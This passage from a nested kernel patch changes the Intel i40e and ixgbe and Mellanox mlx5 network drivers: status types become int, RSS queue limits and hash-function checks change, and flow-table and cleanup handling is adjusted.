+@@ -2574,7 +2574,7 @@ static int i40e_vc_enable_queues_msg(struct i40e_vf *vf, u8 *msg)
+ 	struct virtchnl_queue_select *vqs =
+ 	    (struct virtchnl_queue_select *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 	int i;
+ 
+ 	if (!test_bit(I40E_VF_STATE_ACTIVE, &vf->vf_states)) {
+@@ -2632,7 +2632,7 @@ static int i40e_vc_disable_queues_msg(struct i40e_vf *vf, u8 *msg)
+ 	struct virtchnl_queue_select *vqs =
+ 	    (struct virtchnl_queue_select *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+ 		aq_ret = I40E_ERR_PARAM;
+@@ -2783,7 +2783,7 @@ static int i40e_vc_get_stats_msg(struct i40e_vf *vf, u8 *msg)
+ 	    (struct virtchnl_queue_select *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_eth_stats stats;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 	struct i40e_vsi *vsi;
+ 
+ 	memset(&stats, 0, sizeof(struct i40e_eth_stats));
+@@ -2926,7 +2926,7 @@ static int i40e_vc_add_mac_addr_msg(struct i40e_vf *vf, u8 *msg)
+ 	    (struct virtchnl_ether_addr_list *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_vsi *vsi = NULL;
+-	i40e_status ret = 0;
++	int ret = 0;
+ 	int i;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE) ||
+@@ -2998,7 +2998,7 @@ static int i40e_vc_del_mac_addr_msg(struct i40e_vf *vf, u8 *msg)
+ 	bool was_unimac_deleted = false;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_vsi *vsi = NULL;
+-	i40e_status ret = 0;
++	int ret = 0;
+ 	int i;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE) ||
+@@ -3071,7 +3071,7 @@ static int i40e_vc_add_vlan_msg(struct i40e_vf *vf, u8 *msg)
+ 	    (struct virtchnl_vlan_filter_list *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_vsi *vsi = NULL;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 	int i;
+ 
+ 	if ((vf->num_vlan >= I40E_VC_MAX_VLAN_PER_VF) &&
+@@ -3142,7 +3142,7 @@ static int i40e_vc_remove_vlan_msg(struct i40e_vf *vf, u8 *msg)
+ 	    (struct virtchnl_vlan_filter_list *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_vsi *vsi = NULL;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 	int i;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE) ||
+@@ -3198,7 +3198,7 @@ static int i40e_vc_iwarp_msg(struct i40e_vf *vf, u8 *msg, u16 msglen)
+ {
+ 	struct i40e_pf *pf = vf->pf;
+ 	int abs_vf_id = vf->vf_id + pf->hw.func_caps.vf_base_id;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 
+ 	if (!test_bit(I40E_VF_STATE_ACTIVE, &vf->vf_states) ||
+ 	    !test_bit(I40E_VF_STATE_IWARPENA, &vf->vf_states)) {
+@@ -3227,7 +3227,7 @@ static int i40e_vc_iwarp_qvmap_msg(struct i40e_vf *vf, u8 *msg, bool config)
+ {
+ 	struct virtchnl_iwarp_qvlist_info *qvlist_info =
+ 				(struct virtchnl_iwarp_qvlist_info *)msg;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 
+ 	if (!test_bit(I40E_VF_STATE_ACTIVE, &vf->vf_states) ||
+ 	    !test_bit(I40E_VF_STATE_IWARPENA, &vf->vf_states)) {
+@@ -3263,7 +3263,7 @@ static int i40e_vc_config_rss_key(struct i40e_vf *vf, u8 *msg)
+ 		(struct virtchnl_rss_key *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_vsi *vsi = NULL;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE) ||
+ 	    !i40e_vc_isvalid_vsi_id(vf, vrk->vsi_id) ||
+@@ -3293,7 +3293,7 @@ static int i40e_vc_config_rss_lut(struct i40e_vf *vf, u8 *msg)
+ 		(struct virtchnl_rss_lut *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_vsi *vsi = NULL;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 	u16 i;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE) ||
+@@ -3328,7 +3328,7 @@ static int i40e_vc_get_rss_hena(struct i40e_vf *vf, u8 *msg)
+ {
+ 	struct virtchnl_rss_hena *vrh = NULL;
+ 	struct i40e_pf *pf = vf->pf;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 	int len = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+@@ -3365,7 +3365,7 @@ static int i40e_vc_set_rss_hena(struct i40e_vf *vf, u8 *msg)
+ 		(struct virtchnl_rss_hena *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+ 		aq_ret = I40E_ERR_PARAM;
+@@ -3389,8 +3389,8 @@ err:
+  **/
+ static int i40e_vc_enable_vlan_stripping(struct i40e_vf *vf, u8 *msg)
+ {
+-	i40e_status aq_ret = 0;
+ 	struct i40e_vsi *vsi;
++	int aq_ret = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+ 		aq_ret = I40E_ERR_PARAM;
+@@ -3415,8 +3415,8 @@ err:
+  **/
+ static int i40e_vc_disable_vlan_stripping(struct i40e_vf *vf, u8 *msg)
+ {
+-	i40e_status aq_ret = 0;
+ 	struct i40e_vsi *vsi;
++	int aq_ret = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+ 		aq_ret = I40E_ERR_PARAM;
+@@ -3615,8 +3615,8 @@ static void i40e_del_all_cloud_filters(struct i40e_vf *vf)
+ 			ret = i40e_add_del_cloud_filter(vsi, cfilter, false);
+ 		if (ret)
+ 			dev_err(&pf->pdev->dev,
+-				"VF %d: Failed to delete cloud filter, err %s aq_err %s\n",
+-				vf->vf_id, i40e_stat_str(&pf->hw, ret),
++				"VF %d: Failed to delete cloud filter, err %d aq_err %s\n",
++				vf->vf_id, ret,
+ 				i40e_aq_str(&pf->hw,
+ 					    pf->hw.aq.asq_last_status));
+ 
+@@ -3642,7 +3642,7 @@ static int i40e_vc_del_cloud_filter(struct i40e_vf *vf, u8 *msg)
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_vsi *vsi = NULL;
+ 	struct hlist_node *node;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 	int i, ret;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+@@ -3718,8 +3718,8 @@ static int i40e_vc_del_cloud_filter(struct i40e_vf *vf, u8 *msg)
+ 		ret = i40e_add_del_cloud_filter(vsi, &cfilter, false);
+ 	if (ret) {
+ 		dev_err(&pf->pdev->dev,
+-			"VF %d: Failed to delete cloud filter, err %s aq_err %s\n",
+-			vf->vf_id, i40e_stat_str(&pf->hw, ret),
++			"VF %d: Failed to delete cloud filter, err %d aq_err %s\n",
++			vf->vf_id, ret,
+ 			i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto err;
+ 	}
+@@ -3773,7 +3773,7 @@ static int i40e_vc_add_cloud_filter(struct i40e_vf *vf, u8 *msg)
+ 	struct i40e_cloud_filter *cfilter = NULL;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_vsi *vsi = NULL;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 	int i, ret;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+@@ -3852,8 +3852,8 @@ static int i40e_vc_add_cloud_filter(struct i40e_vf *vf, u8 *msg)
+ 		ret = i40e_add_del_cloud_filter(vsi, cfilter, true);
+ 	if (ret) {
+ 		dev_err(&pf->pdev->dev,
+-			"VF %d: Failed to add cloud filter, err %s aq_err %s\n",
+-			vf->vf_id, i40e_stat_str(&pf->hw, ret),
++			"VF %d: Failed to add cloud filter, err %d aq_err %s\n",
++			vf->vf_id, ret,
+ 			i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto err_free;
+ 	}
+@@ -3882,7 +3882,7 @@ static int i40e_vc_add_qch_msg(struct i40e_vf *vf, u8 *msg)
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_link_status *ls = &pf->hw.phy.link_info;
+ 	int i, adq_request_qps = 0;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 	u64 speed = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+@@ -3994,7 +3994,7 @@ err:
+ static int i40e_vc_del_qch_msg(struct i40e_vf *vf, u8 *msg)
+ {
+ 	struct i40e_pf *pf = vf->pf;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+ 		aq_ret = I40E_ERR_PARAM;
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_ethtool.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_ethtool.c
+index 6cfc9dc165378..0bbad4a5cc2f5 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_ethtool.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_ethtool.c
+@@ -2665,6 +2665,14 @@ static int ixgbe_get_rss_hash_opts(struct ixgbe_adapter *adapter,
+ 	return 0;
+ }
+ 
++static int ixgbe_rss_indir_tbl_max(struct ixgbe_adapter *adapter)
++{
++	if (adapter->hw.mac.type < ixgbe_mac_X550)
++		return 16;
++	else
++		return 64;
++}
++
+ static int ixgbe_get_rxnfc(struct net_device *dev, struct ethtool_rxnfc *cmd,
+ 			   u32 *rule_locs)
+ {
+@@ -2673,7 +2681,8 @@ static int ixgbe_get_rxnfc(struct net_device *dev, struct ethtool_rxnfc *cmd,
+ 
+ 	switch (cmd->cmd) {
+ 	case ETHTOOL_GRXRINGS:
+-		cmd->data = adapter->num_rx_queues;
++		cmd->data = min_t(int, adapter->num_rx_queues,
++				  ixgbe_rss_indir_tbl_max(adapter));
+ 		ret = 0;
+ 		break;
+ 	case ETHTOOL_GRXCLSRLCNT:
+@@ -3075,14 +3084,6 @@ static int ixgbe_set_rxnfc(struct net_device *dev, struct ethtool_rxnfc *cmd)
+ 	return ret;
+ }
+ 
+-static int ixgbe_rss_indir_tbl_max(struct ixgbe_adapter *adapter)
+-{
+-	if (adapter->hw.mac.type < ixgbe_mac_X550)
+-		return 16;
+-	else
+-		return 64;
+-}
+-
+ static u32 ixgbe_get_rxfh_key_size(struct net_device *netdev)
+ {
+ 	return IXGBE_RSS_KEY_SIZE;
+@@ -3131,8 +3132,8 @@ static int ixgbe_set_rxfh(struct net_device *netdev, const u32 *indir,
+ 	int i;
+ 	u32 reta_entries = ixgbe_rss_indir_tbl_entries(adapter);
+ 
+-	if (hfunc)
+-		return -EINVAL;
++	if (hfunc != ETH_RSS_HASH_NO_CHANGE && hfunc != ETH_RSS_HASH_TOP)
++		return -EOPNOTSUPP;
+ 
+ 	/* Fill out the redirection table */
+ 	if (indir) {
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/dev.c b/drivers/net/ethernet/mellanox/mlx5/core/dev.c
+index 0571e40c6ee5f..02bb9d43ff9c4 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/dev.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/dev.c
+@@ -396,7 +396,7 @@ int mlx5_attach_device(struct mlx5_core_dev *dev)
+ 	return ret;
+ }
+ 
+-void mlx5_detach_device(struct mlx5_core_dev *dev)
++void mlx5_detach_device(struct mlx5_core_dev *dev, bool suspend)
+ {
+ 	struct mlx5_priv *priv = &dev->priv;
+ 	struct auxiliary_device *adev;
+@@ -426,7 +426,7 @@ void mlx5_detach_device(struct mlx5_core_dev *dev)
+ 
+ 		adrv = to_auxiliary_drv(adev->dev.driver);
+ 
+-		if (adrv->suspend) {
++		if (adrv->suspend && suspend) {
+ 			adrv->suspend(adev, pm);
+ 			continue;
+ 		}
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/devlink.c b/drivers/net/ethernet/mellanox/mlx5/core/devlink.c
+index 5bd83c0275f82..2370e9ad52ea9 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/devlink.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/devlink.c
+@@ -104,7 +104,7 @@ static int mlx5_devlink_reload_fw_activate(struct devlink *devlink, struct netli
+ 	if (err)
+ 		return err;
+ 
+-	mlx5_unload_one_devl_locked(dev);
++	mlx5_unload_one_devl_locked(dev, true);
+ 	err = mlx5_health_wait_pci_up(dev);
+ 	if (err)
+ 		NL_SET_ERR_MSG_MOD(extack, "FW activate aborted, PCI reads fail after reset");
+@@ -162,7 +162,7 @@ static int mlx5_devlink_reload_down(struct devlink *devlink, bool netns_change,
+ 
+ 	switch (action) {
+ 	case DEVLINK_RELOAD_ACTION_DRIVER_REINIT:
+-		mlx5_unload_one_devl_locked(dev);
++		mlx5_unload_one_devl_locked(dev, false);
+ 		break;
+ 	case DEVLINK_RELOAD_ACTION_FW_ACTIVATE:
+ 		if (limit == DEVLINK_RELOAD_LIMIT_NO_RESET)
+@@ -196,7 +196,7 @@ static int mlx5_devlink_reload_up(struct devlink *devlink, enum devlink_reload_a
+ 			break;
+ 		/* On fw_activate action, also driver is reloaded and reinit performed */
+ 		*actions_performed |= BIT(DEVLINK_RELOAD_ACTION_DRIVER_REINIT);
+-		ret = mlx5_load_one_devl_locked(dev, false);
++		ret = mlx5_load_one_devl_locked(dev, true);
+ 		break;
+ 	default:
+ 		/* Unsupported action should not get to this function */
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/tc/post_act.c b/drivers/net/ethernet/mellanox/mlx5/core/en/tc/post_act.c
+index 4e48946c4c2ac..0290e0dea5390 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/tc/post_act.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/tc/post_act.c
+@@ -106,22 +106,17 @@ err_rule:
+ }
+ 
+ struct mlx5e_post_act_handle *
+-mlx5e_tc_post_act_add(struct mlx5e_post_act *post_act, struct mlx5_flow_attr *attr)
++mlx5e_tc_post_act_add(struct mlx5e_post_act *post_act, struct mlx5_flow_attr *post_attr)
+ {
+-	u32 attr_sz = ns_to_attr_sz(post_act->ns_type);
+ 	struct mlx5e_post_act_handle *handle;
+-	struct mlx5_flow_attr *post_attr;
+ 	int err;
+ 
+ 	handle = kzalloc(sizeof(*handle), GFP_KERNEL);
+-	post_attr = mlx5_alloc_flow_attr(post_act->ns_type);
+-	if (!handle || !post_attr) {
+-		kfree(post_attr);
++	if (!handle) {
+ 		kfree(handle);
+ 		return ERR_PTR(-ENOMEM);
+ 	}
+ 
+-	memcpy(post_attr, attr, attr_sz);
+ 	post_attr->chain = 0;
+ 	post_attr->prio = 0;
+ 	post_attr->ft = post_act->ft;
+@@ -145,7 +140,6 @@ mlx5e_tc_post_act_add(struct mlx5e_post_act *post_act, struct mlx5_flow_attr *at
+ 	return handle;
+ 
+ err_xarray:
+-	kfree(post_attr);
+ 	kfree(handle);
+ 	return ERR_PTR(err);
+ }
+@@ -164,7 +158,6 @@ mlx5e_tc_post_act_del(struct mlx5e_post_act *post_act, struct mlx5e_post_act_han
+ 	if (!IS_ERR_OR_NULL(handle->rule))
+ 		mlx5e_tc_post_act_unoffload(post_act, handle);
+ 	xa_erase(&post_act->ids, handle->id);
+-	kfree(handle->attr);
+ 	kfree(handle);
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/tc/post_act.h b/drivers/net/ethernet/mellanox/mlx5/core/en/tc/post_act.h
+index f476774c0b75d..40b8df184af51 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/tc/post_act.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/tc/post_act.h
+@@ -19,7 +19,7 @@ void
+ mlx5e_tc_post_act_destroy(struct mlx5e_post_act *post_act);
+ 
+ struct mlx5e_post_act_handle *
+-mlx5e_tc_post_act_add(struct mlx5e_post_act *post_act, struct mlx5_flow_attr *attr);
++mlx5e_tc_post_act_add(struct mlx5e_post_act *post_act, struct mlx5_flow_attr *post_attr);
+ 
+ void
+ mlx5e_tc_post_act_del(struct mlx5e_post_act *post_act, struct mlx5e_post_act_handle *handle);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/tc/sample.c b/drivers/net/ethernet/mellanox/mlx5/core/en/tc/sample.c
+index f2c2c752bd1c3..c57b097275241 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/tc/sample.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/tc/sample.c
+@@ -14,10 +14,10 @@
+ 
+ #define MLX5_ESW_VPORT_TBL_SIZE_SAMPLE (64 * 1024)
+ 
+-static const struct esw_vport_tbl_namespace mlx5_esw_vport_tbl_sample_ns = {
++static struct esw_vport_tbl_namespace mlx5_esw_vport_tbl_sample_ns = {
+ 	.max_fte = MLX5_ESW_VPORT_TBL_SIZE_SAMPLE,
+ 	.max_num_groups = 0,    /* default num of groups */
+-	.flags = MLX5_FLOW_TABLE_TUNNEL_EN_REFORMAT | MLX5_FLOW_TABLE_TUNNEL_EN_DECAP,
++	.flags = 0,
+ };
+ 
+ struct mlx5e_tc_psample {
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_fs.c b/drivers/net/ethernet/mellanox/mlx5/core/en_fs.c
+index 7cd36f4ac3efc..eba601487eb79 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_fs.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_fs.c
+@@ -776,6 +776,7 @@ static int mlx5e_create_promisc_table(struct mlx5e_flow_steering *fs)
+ 	ft->t = mlx5_create_auto_grouped_flow_table(fs->ns, &ft_attr);
+ 	if (IS_ERR(ft->t)) {
+ 		err = PTR_ERR(ft->t);
++		ft->t = NULL;
+ 		fs_err(fs, "fail to create promisc table err=%d\n", err);
+ 		return err;
+ 	}
+@@ -803,7 +804,7 @@ static void mlx5e_del_promisc_rule(struct mlx5e_flow_steering *fs)
+ 
+ static void mlx5e_destroy_promisc_table(struct mlx5e_flow_steering *fs)
+ {
+-	if (WARN(!fs->promisc.ft.t, "Trying to remove non-existing promiscuous table"))
++	if (!fs->promisc.ft.t)
+ 		return;
+ 	mlx5e_del_promisc_rule(fs);
+ 	mlx5_destroy_flow_table(fs->promisc.ft.t);
+@@ -1471,6 +1472,8 @@ err:
+ 
+ void mlx5e_fs_cleanup(struct mlx5e_flow_steering *fs)
+ {
++	if (!fs)
++		return;
+ 	mlx5e_fs_ethtool_free(fs);
+ 	mlx5e_fs_tc_free(fs);
+ 	mlx5e_fs_vlan_free(fs);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+index 1f4233b2842f7..53eba076c53fc 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+@@ -5208,6 +5208,7 @@ static void mlx5e_nic_cleanup(struct mlx5e_priv *priv)
+ 	mlx5e_health_destroy_reporters(priv);
+ 	mlx5e_ktls_cleanup(priv);
+ 	mlx5e_fs_cleanup(priv->fs);
++	priv->fs = NULL;
+ }
+ 
+ static int mlx5e_init_nic_rx(struct mlx5e_priv *priv)
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c b/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
+index 301a734b7c6a7..21426decc4bde 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
+@@ -822,6 +822,7 @@ static int mlx5e_init_ul_rep(struct mlx5_core_dev *mdev,
+ static void mlx5e_cleanup_rep(struct mlx5e_priv *priv)
+ {
+ 	mlx5e_fs_cleanup(priv->fs);
++	priv->fs = NULL;
+ }
+ 
+ static int mlx5e_create_rep_ttc_table(struct mlx5e_priv *priv)
+@@ -988,6 +989,7 @@ err_close_drop_rq:
+ 	priv->rx_res = NULL;
+ err_free_fs:
+ 	mlx5e_fs_cleanup(priv->fs);
++	priv->fs = NULL;
+ 	return err;
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/esw/vporttbl.c b/drivers/net/ethernet/mellanox/mlx5/core/esw/vporttbl.c
+index 9e72118f2e4c0..749c3957a1280 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/esw/vporttbl.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/esw/vporttbl.c
+@@ -11,7 +11,7 @@ struct mlx5_vport_key {
+ 	u16 prio;
+ 	u16 vport;
+ 	u16 vhca_id;
+-	const struct esw_vport_tbl_namespace *vport_ns;
++	struct esw_vport_tbl_namespace *vport_ns;
+ } __packed;
+ 
+ struct mlx5_vport_table {
+@@ -21,6 +21,14 @@ struct mlx5_vport_table {
+ 	struct mlx5_vport_key key;
+ };
+ 
++static void
++esw_vport_tbl_init(struct mlx5_eswitch *esw, struct esw_vport_tbl_namespace *ns)
++{
++	if (esw->offloads.encap != DEVLINK_ESWITCH_ENCAP_MODE_NONE)
++		ns->flags |= (MLX5_FLOW_TABLE_TUNNEL_EN_REFORMAT |
++			      MLX5_FLOW_TABLE_TUNNEL_EN_DECAP);
++}
++
+ static struct mlx5_flow_table *
+ esw_vport_tbl_create(struct mlx5_eswitch *esw, struct mlx5_flow_namespace *ns,
+ 		     const struct esw_vport_tbl_namespace *vport_ns)
+@@ -80,6 +88,7 @@ mlx5_esw_vporttbl_get(struct mlx5_eswitch *esw, struct mlx5_vport_tbl_attr *attr
+ 	u32 hkey;
+ 
+ 	mutex_lock(&esw->fdb_table.offloads.vports.lock);
++	esw_vport_tbl_init(esw, attr->vport_ns);
+ 	hkey = flow_attr_to_vport_key(esw, attr, &skey);
+ 	e = esw_vport_tbl_lookup(esw, &skey, hkey);
+ 	if (e) {
+@@ -127,6 +136,7 @@ mlx5_esw_vporttbl_put(struct mlx5_eswitch *esw, struct mlx5_vport_tbl_attr *attr
+ 	u32 hkey;
+ 
+ 	mutex_lock(&esw->fdb_table.offloads.vports.lock);
++	esw_vport_tbl_init(esw, attr->vport_ns);
+ 	hkey = flow_attr_to_vport_key(esw, attr, &key);
+ 	e = esw_vport_tbl_lookup(esw, &key, hkey);
+ 	if (!e || --e->num_rules)
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
+index 92644fbb50816..ceb6722c84e2c 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
+@@ -677,7 +677,7 @@ struct mlx5_vport_tbl_attr {
+ 	u32 chain;
+ 	u16 prio;
+ 	u16 vport;
+-	const struct esw_vport_tbl_namespace *vport_ns;
++	struct esw_vport_tbl_namespace *vport_ns;
+ };
+ 
+ struct mlx5_flow_table *
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+index 0facc709f0e74..6561b6b505568 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+@@ -73,7 +73,7 @@
+ 
+ #define MLX5_ESW_FT_OFFLOADS_DROP_RULE (1)
+ 
+-static const struct esw_vport_tbl_namespace mlx5_esw_vport_tbl_mirror_ns = {
++static struct esw_vport_tbl_namespace mlx5_esw_vport_tbl_mirror_ns = {
+ 	.max_fte = MLX5_ESW_VPORT_TBL_SIZE,
+ 	.max_num_groups = MLX5_ESW_VPORT_TBL_NUM_GROUPS,
+ 	.flags = 0,
+@@ -763,7 +763,6 @@ mlx5_eswitch_add_fwd_rule(struct mlx5_eswitch *esw,
+ 	kfree(dest);
+ 	return rule;
+ err_chain_src_rewrite:
+-	esw_put_dest_tables_loop(esw, attr, 0, i);
+ 	mlx5_esw_vporttbl_put(esw, &fwd_attr);
+ err_get_fwd:
+ 	mlx5_chains_put_table(chains, attr->chain, attr->prio, 0);
+@@ -806,7 +805,6 @@ __mlx5_eswitch_del_rule(struct mlx5_eswitch *esw,
+ 	if (fwd_rule)  {
+ 		mlx5_esw_vporttbl_put(esw, &fwd_attr);
+ 		mlx5_chains_put_table(chains, attr->chain, attr->prio, 0);
+-		esw_put_dest_tables_loop(esw, attr, 0, esw_attr->split_count);
+ 	} else {
+ 		if (split)
+ 			mlx5_esw_vporttbl_put(esw, &fwd_attr);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads_termtbl.c b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads_termtbl.c
+index 3a9a6bb9158de..edd9102583144 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads_termtbl.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads_termtbl.c
+@@ -210,18 +210,6 @@ static bool mlx5_eswitch_offload_is_uplink_port(const struct mlx5_eswitch *esw,
+ 	return (port_mask & port_value) == MLX5_VPORT_UPLINK;
+ }
+ 
+-static bool
+-mlx5_eswitch_is_push_vlan_no_cap(struct mlx5_eswitch *esw,
+-				 struct mlx5_flow_act *flow_act)
+-{
+-	if (flow_act->action & MLX5_FLOW_CONTEXT_ACTION_VLAN_PUSH &&
+-	    !(mlx5_fs_get_capabilities(esw->dev, MLX5_FLOW_NAMESPACE_FDB) &
+-	      MLX5_FLOW_STEERING_CAP_VLAN_PUSH_ON_RX))
+-		return true;
+-
+-	return false;
+-}
+-
+ bool
+ mlx5_eswitch_termtbl_required(struct mlx5_eswitch *esw,
+ 			      struct mlx5_flow_attr *attr,
+@@ -237,7 +225,10 @@ mlx5_eswitch_termtbl_required(struct mlx5_eswitch *esw,
+ 	    (!mlx5_eswitch_offload_is_uplink_port(esw, spec) && !esw_attr->int_port))
+ 		return false;
+ 
+-	if (mlx5_eswitch_is_push_vlan_no_cap(esw, flow_act))
++	/* push vlan on RX */
++	if (flow_act->action & MLX5_FLOW_CONTEXT_ACTION_VLAN_PUSH &&
++	    !(mlx5_fs_get_capabilities(esw->dev, MLX5_FLOW_NAMESPACE_FDB) &
++	      MLX5_FLOW_STEERING_CAP_VLAN_PUSH_ON_RX))
+ 		return true;
+ 
+ 	/* hairpin */
+@@ -261,31 +252,19 @@ mlx5_eswitch_add_termtbl_rule(struct mlx5_eswitch *esw,
+ 	struct mlx5_flow_act term_tbl_act = {};
+ 	struct mlx5_flow_handle *rule = NULL;
+ 	bool term_table_created = false;
+-	bool is_push_vlan_on_rx;
+ 	int num_vport_dests = 0;
+ 	int i, curr_dest;
+ 
+-	is_push_vlan_on_rx = mlx5_eswitch_is_push_vlan_no_cap(esw, flow_act);
+ 	mlx5_eswitch_termtbl_actions_move(flow_act, &term_tbl_act);
+ 	term_tbl_act.action |= MLX5_FLOW_CONTEXT_ACTION_FWD_DEST;
+ 
+ 	for (i = 0; i < num_dest; i++) {
+ 		struct mlx5_termtbl_handle *tt;
+-		bool hairpin = false;
+ 
+ 		/* only vport destinations can be terminated */
+ 		if (dest[i].type != MLX5_FLOW_DESTINATION_TYPE_VPORT)
+ 			continue;
+ 
+-		if (attr->dests[num_vport_dests].rep &&
+-		    attr->dests[num_vport_dests].rep->vport == MLX5_VPORT_UPLINK)
+-			hairpin = true;
+-
+-		if (!is_push_vlan_on_rx && !hairpin) {
+-			num_vport_dests++;
+-			continue;
+-		}
+-
+ 		if (attr->dests[num_vport_dests].flags & MLX5_ESW_DEST_ENCAP) {
+ 			term_tbl_act.action |= MLX5_FLOW_CONTEXT_ACTION_PACKET_REFORMAT;
+ 			term_tbl_act.pkt_reformat = attr->dests[num_vport_dests].pkt_reformat;
+@@ -333,9 +312,6 @@ revert_changes:
+ 	for (curr_dest = 0; curr_dest < num_vport_dests; curr_dest++) {
+ 		struct mlx5_termtbl_handle *tt = attr->dests[curr_dest].termtbl;
+ 
+-		if (!tt)
+-			continue;
+-
+ 		attr->dests[curr_dest].termtbl = NULL;
+ 
+ 		/* search for the destination associated with the
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/fw_reset.c b/drivers/net/ethernet/mellanox/mlx5/core/fw_reset.c
+index 1e46f9afa40e0..d219f8417d93a 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/fw_reset.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/fw_reset.c
+@@ -150,11 +150,11 @@ static void mlx5_fw_reset_complete_reload(struct mlx5_core_dev *dev)
+ 	if (test_bit(MLX5_FW_RESET_FLAGS_PENDING_COMP, &fw_reset->reset_flags)) {
